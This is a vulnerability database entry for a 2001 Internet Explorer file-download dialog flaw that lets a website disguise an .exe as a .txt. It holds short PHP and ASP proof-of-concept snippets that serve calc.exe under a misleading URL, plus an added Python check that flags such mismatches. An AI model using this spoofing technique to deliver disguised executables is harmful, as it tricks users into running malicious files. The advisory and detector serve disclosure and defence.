Published: 2001-11-26 00:00:00
Revised: 2008-09-05 16:25:08

[Original text] Internet Explorer 5.5 and 6.0 allows remote attackers to cause the File Download dialogue box to misrepresent the name of the file in the dialogue in a way that could fool users into thinking that the file type is safe to download.

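[CNNVD] Internet Explorer vulnerability (CNNVD-200111-035)

        A vulnerability exists in Internet Explorer 5.5 and 6.0. A remote attacker can exploit it to make the File Download dialog misrepresent the file name, misleading users into believing they are downloading a safe file.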

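- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]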

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:5.5  Microsoft ie 5.5
cpe:/a:microsoft:ie:6.0  Microsoft Internet Explorer 6.0

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1014  IE File Download Dialog Deception Vulnerability

- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  XF  ie-file-download-ext-spoof(7636)
(VENDOR_ADVISORY)  BUGTRAQ  20011126 File extensions spoofable in MSIE download dialog

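- Vulnerability information

Internet Explorer vulnerability
High risk  Unknown
2001-11-26 00:00:00 2005-05-02 00:00:00
        A vulnerability exists in Internet Explorer 5.5 and 6.0. A remote attacker can exploit it to make the File Download dialog misrepresent the file name, misleading users into believing they are downloading a safe file.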

- Advisories and patches


- Vulnerability information (21164)

Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability (EDBID:21164)
windows remote
2001-11-26 Verified
0 StatiC
N/A

It is possible for a malicious webmaster, hosting files on a website, to spoof file extensions for users of Internet Explorer. For example, an .exe file can be made to look like a .txt file (or another seemingly harmless file type) in the Download dialog.

When including a certain string of characters between the filename and the actual file extension, IE will display the specified misleading file extension type.

The end result is that a malicious webmaster is able to entice a user to open or save arbitrary files to their local system.

* It has been reported that patched systems may still be vulnerable to this issue. If the attacker composes a .hta file, using the methods described above, it is possible for the malicious file to go undetected by patched systems. 

With an Apache/PHP server, add .txt to the already existing .php extension in the apache.conf file, so that Apache will recognise .txt extensions as PHP script files.

1. Copy the real windows calc.exe from a windows system to the html root dir.

2. Copy the readme.txt file below to the same html root dir.

3. Go to the URL http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.

FILE <readme.txt> BEGIN ----
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
FILE <readme.txt> END ----

"Jonathan G. Lampe" submitted this example in ASP for IIS webservers:


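' ADODB.Stream type constant for binary data
Const adTypeBinary = 1
Dim strFilePath

' Headers that tell the browser to save the response under the name calc.exe
Response.ContentType = "application/octet-stream"
Response.AddHeader "Content-Disposition","attachment; filename=calc.exe"

' Resolve calc.exe in the same directory as this script
strFilePath = Server.MapPath(".") & "\calc.exe"

' Load the file as a binary stream
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath

' Send the file contents as the response body
Response.BinaryWrite objStream.Read

Set objStream = Nothing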
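
A defender-side check for the behaviour described above, as an added example (not part of the original advisory or the submitted PoCs): it compares the extension in the requested URL with the filename in the Content-Disposition response header and flags responses that would save as a runnable type. The extension list, function names and sample records are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Extensions treated as directly runnable on Windows (assumed list; extend locally).
RISKY_EXTS = {".exe", ".hta", ".com", ".scr", ".bat", ".cmd", ".pif", ".vbs", ".js"}

_FILENAME_RE = re.compile(r'filename\s*=\s*("([^"]*)"|[^;\s]+)', re.IGNORECASE)


def disposition_filename(header):
    """Return the filename parameter of a Content-Disposition header, or None."""
    m = _FILENAME_RE.search(header or "")
    if not m:
        return None
    return m.group(2) if m.group(2) is not None else m.group(1)


def ext_of(name):
    """Lower-cased final extension, ignoring trailing dots and spaces."""
    return posixpath.splitext(name.strip().rstrip(". "))[1].lower()


def check_download(url, content_disposition):
    """Return a finding when the URL and the served file name disagree, else None."""
    served = disposition_filename(content_disposition)
    if served is None:
        return None
    url_ext = ext_of(posixpath.basename(urlsplit(url).path))
    served_ext = ext_of(served.replace("\\", "/").rsplit("/", 1)[-1])
    if served_ext in RISKY_EXTS and served_ext != url_ext:
        return f"{url}: URL ends in {url_ext or '(none)'} but response saves as {served}"
    return None


def scan(records):
    """Run check_download over (url, Content-Disposition) pairs; keep the findings."""
    return [f for f in (check_download(u, cd) for u, cd in records) if f]


# Constructed sample records (url, Content-Disposition), not taken from real traffic.
SAMPLES = [
    ("http://yourserver/readme.txt", "attachment; filename=calc.exe"),
    ("http://yourserver/notes.txt", 'attachment; filename="notes.txt"'),
    ("http://yourserver/tools/setup.exe", "attachment; filename=setup.exe"),
    ("http://yourserver/help.txt", 'attachment; filename="help.HTA"'),
]

if __name__ == "__main__":
    print("\n".join(scan(SAMPLES)))
```

Only the first and last sample records are flagged; a download whose URL already ends in .exe is not a mismatch and is left to other controls.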


- Vulnerability information

Microsoft IE Download Dialog File Extension Spoofing Weakness
Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified, Third-party Verified

- Vulnerability description

- Timeline

2001-11-26 Unknown
2001-11-26 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability. Check the vendor advisory or solution in the references section.

- Related references

- Vulnerability author

Unknown or Incomplete